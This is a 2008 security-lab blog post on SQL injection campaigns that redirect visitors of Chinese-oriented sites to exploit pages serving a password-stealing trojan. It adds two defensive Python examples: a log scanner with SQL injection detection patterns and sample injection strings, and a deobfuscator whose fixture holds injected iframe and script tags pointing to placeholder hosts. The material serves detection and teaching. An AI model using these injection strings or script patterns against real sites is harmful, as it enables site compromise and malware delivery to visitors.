NEWS FROM THE LAB - Friday, August 8, 2008

SQL Injection Attacks Targeting Chinese-oriented Sites Posted by Response @ 07:17 GMT

With all the attention on China these days, especially in conjunction with the Beijing 2008 Olympic Games, and with "China" being one of the more popular search engine keywords at the moment, it makes sense for malware writers to focus their attention on the Chinese web — and we've been seeing some interesting examples of SQL injection attacks specifically targeting websites designed for a Chinese audience, whether on the mainland or overseas.

Like most SQL injection attacks of this kind, these begin with a malicious script being injected into the pages of a legitimate site, compromising it and redirecting its visitors to a malicious website. That website then takes advantage of vulnerabilities present on the visitor's computer to download and execute malicious programs.
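The injection stage described above is the one a site owner can look for in their own web server logs, since the SQL statements travel in the request URL. The following is an added example, not code from this post or from F-Secure: a small Python scanner over constructed Apache combined-format log lines (addresses from documentation IP ranges, no real traffic) that URL-decodes each request target, peeling double encoding as well, and flags requests whose query string carries SQL statements. The rule names and sample lines are the example's own.

```python
import re
from urllib.parse import unquote

# Constructed sample log (not from the post). Lines 3 and 4 carry SQL in the
# query string; line 4 is URL-encoded twice. The rest is ordinary traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [08/Aug/2008:07:01:12 +0000] "GET /news.asp?id=1532 HTTP/1.1" 200 8123 "-" "Mozilla/4.0"
203.0.113.11 - - [08/Aug/2008:07:01:15 +0000] "GET /search.asp?q=beijing+olympics HTTP/1.1" 200 4410 "-" "Mozilla/4.0"
198.51.100.7 - - [08/Aug/2008:07:02:03 +0000] "GET /news.asp?id=1532;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x41424344%20AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1" 200 8123 "-" "Mozilla/4.0"
198.51.100.7 - - [08/Aug/2008:07:02:09 +0000] "GET /news.asp?id=1532%2527%2520UNION%2520SELECT%25201,2,3-- HTTP/1.1" 500 612 "-" "Mozilla/4.0"
203.0.113.12 - - [08/Aug/2008:07:02:30 +0000] "GET /about.asp HTTP/1.1" 200 2201 "-" "Mozilla/4.0"
"""

# Apache "combined" format: ip ident user [time] "method target protocol" status size ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r"(?P<status>\d{3}) \S+"
)

# Detection rules, applied to the fully URL-decoded request target.
SQLI_RULES = [
    ("stacked-statement", re.compile(r";\s*(declare|exec|set|update|insert|drop)\b", re.I)),
    ("union-select", re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I)),
    ("hex-cast", re.compile(r"\bcast\s*\(\s*0x[0-9a-f]+", re.I)),
    ("comment-terminator", re.compile(r"(--|/\*)\s*$")),
    ("tautology", re.compile(r"'\s*or\s+\S+\s*=\s*\S+", re.I)),
]


def decode_target(target, max_rounds=3):
    """URL-decode repeatedly until stable, since injections are often
    double-encoded to slip past a single-pass filter. '+' becomes a space."""
    text = target
    for _ in range(max_rounds):
        decoded = unquote(text.replace("+", " "))
        if decoded == text:
            break
        text = decoded
    return text


def scan_log(text):
    """Return one finding per request that trips at least one rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # malformed or non-combined line, skip
        decoded = decode_target(m.group("target"))
        hits = [name for name, rule in SQLI_RULES if rule.search(decoded)]
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "status": m.group("status"),
                "decoded": decoded,
                "rules": hits,
            })
    return findings


def offending_ips(findings):
    """Source addresses sorted by number of flagged requests, busiest first."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['ip']} {f['time']} status={f['status']} rules={f['rules']}")
        print(f"    {f['decoded']}")
    print("sources:", offending_ips(found))
```

Decoding before matching is the important part: the second flagged request would pass every rule untouched if the scanner looked at the raw `%2527`-encoded target. An HTTP 200 on a flagged request, as in the third line, is worth more attention than a 500, since it suggests the statement executed.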

[Image: Obfuscated Script]

In one of the samples we received, a close look at the obfuscated URL showed that users of the compromised website were being redirected to "http://vc??.cn". Though this malicious website was first reported in April 2008, it is still live and infectious today. Additional mirror sites include pdh0??.cn, iihao??.cn, qqhao??.cn, yyhao??.cn, zzhao??.cn and more, but they all redirect users to two sites hosting the most invasive programs: jzm0??.cn and hby0??.cn.
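Injected redirects like the one above are usually hidden behind a layer or two of JavaScript string encoding, which is why the URL only became visible after a close look. Added example, not code from this post or from F-Secure: a Python routine that statically unwraps the `unescape()` and `String.fromCharCode()` layers commonly used for this, without executing anything, and then lists every script or iframe source that points off the site's own hosts. The page content and the `*.invalid` hosts are constructed for the example; the masked domains from the post are not used.

```python
import re
from urllib.parse import unquote, urlparse

# Constructed sample page (not from the post): a legitimate page whose
# database-backed content now carries two injected script blocks. The redirect
# targets are hidden behind unescape() and String.fromCharCode(). All hosts
# are reserved .invalid placeholders.
SAMPLE_PAGE = """<html><head><title>News</title>
<script src="/static/site.js"></script></head>
<body><p>Latest headlines...</p>
<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fframe.example.invalid%2Fx.htm%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E"));</script>
<script>eval(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,122,46,105,110,118,97,108,105,100,47,97,46,106,115,62,60,47,115,99,114,105,112,116,62));</script>
</body></html>"""

_FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)")
_UNESCAPE = re.compile(r"""unescape\(\s*(["'])(.*?)\1\s*\)""", re.S)
_JS_UNICODE = re.compile(r"%u([0-9A-Fa-f]{4})")  # JS unescape also takes %uXXXX
_SRC_TAG = re.compile(r"""<(script|iframe)\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)


def _decode_fromcharcode(m):
    codes = [int(c) for c in m.group(1).split(",") if c.strip()]
    return "".join(chr(c) for c in codes)


def _decode_unescape(m):
    text = _JS_UNICODE.sub(lambda u: chr(int(u.group(1), 16)), m.group(2))
    return unquote(text)


def deobfuscate(html, max_layers=5):
    """Statically unwrap unescape() and String.fromCharCode() layers.

    Repeats until the text stops changing so nested layers are peeled too.
    This is pure string rewriting; no script is ever evaluated.
    """
    for _ in range(max_layers):
        decoded = _FROMCHARCODE.sub(_decode_fromcharcode, html)
        decoded = _UNESCAPE.sub(_decode_unescape, decoded)
        if decoded == html:
            break
        html = decoded
    return html


def external_sources(html, allowed_hosts):
    """Return (tag, url) for every script/iframe source whose host is not on
    the site's own allowlist. Relative sources have no host and are skipped."""
    findings = []
    for tag, url in _SRC_TAG.findall(deobfuscate(html)):
        host = urlparse(url).netloc.lower()
        if host and host not in allowed_hosts:
            findings.append((tag.lower(), url))
    return findings


if __name__ == "__main__":
    for tag, url in external_sources(SAMPLE_PAGE, {"www.example.com"}):
        print(f"suspicious <{tag}> loading {url}")
```

Run against a site's rendered pages or directly against the text columns of its database, the allowlist approach catches the injection regardless of which domain the redirect happens to point at that week, which matters given how many mirror domains the post lists. The zero-size iframe in the sample is also typical of these injections and is a second signal worth logging.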

The "vc??.cn" website basically functions as a transit station, deciding which website the user gets shunted to next depending on which browser they are using. Whichever route they take, they end up infected with a password-stealing trojan, which we detect as Trojan-GameThief.Win32.OnLineGames.snsq.

[Image: Infected Results]

The interesting thing about this particular SQL injection attack is that a number of the vulnerabilities the malware writers exploit are in software most likely to be found on Chinese websites and, by extension, on the computers of Chinese (or Chinese-literate) visitors. For example, the Baidu Soba Remote Code Execute Vulnerability is more or less exclusive to the Chinese web, as is the Sina DLoader Class ActiveX Control "DonwloadAndInstall" Method Arbitrary File Download Vulnerability.

That's not to say that non-Chinese visitors won't be affected by this attack, as a specially crafted Flash file exploiting an Adobe Flash Player integer overflow (CVE-2007-0071) is also served. When the webpage is loaded, the crafted file triggers the overflow, corrupting memory the player relies on, and the attacker's hidden code is executed as a result. If the user hasn't updated their Flash Player to a version newer than those targeted, their computer is vulnerable.

For such users, then, the best advice is to run the F-Secure Health Check to determine whether your computer has all the latest updates and, most importantly, don't click on any suspicious links related to the Olympics!

Response Team post by Lordian & Alia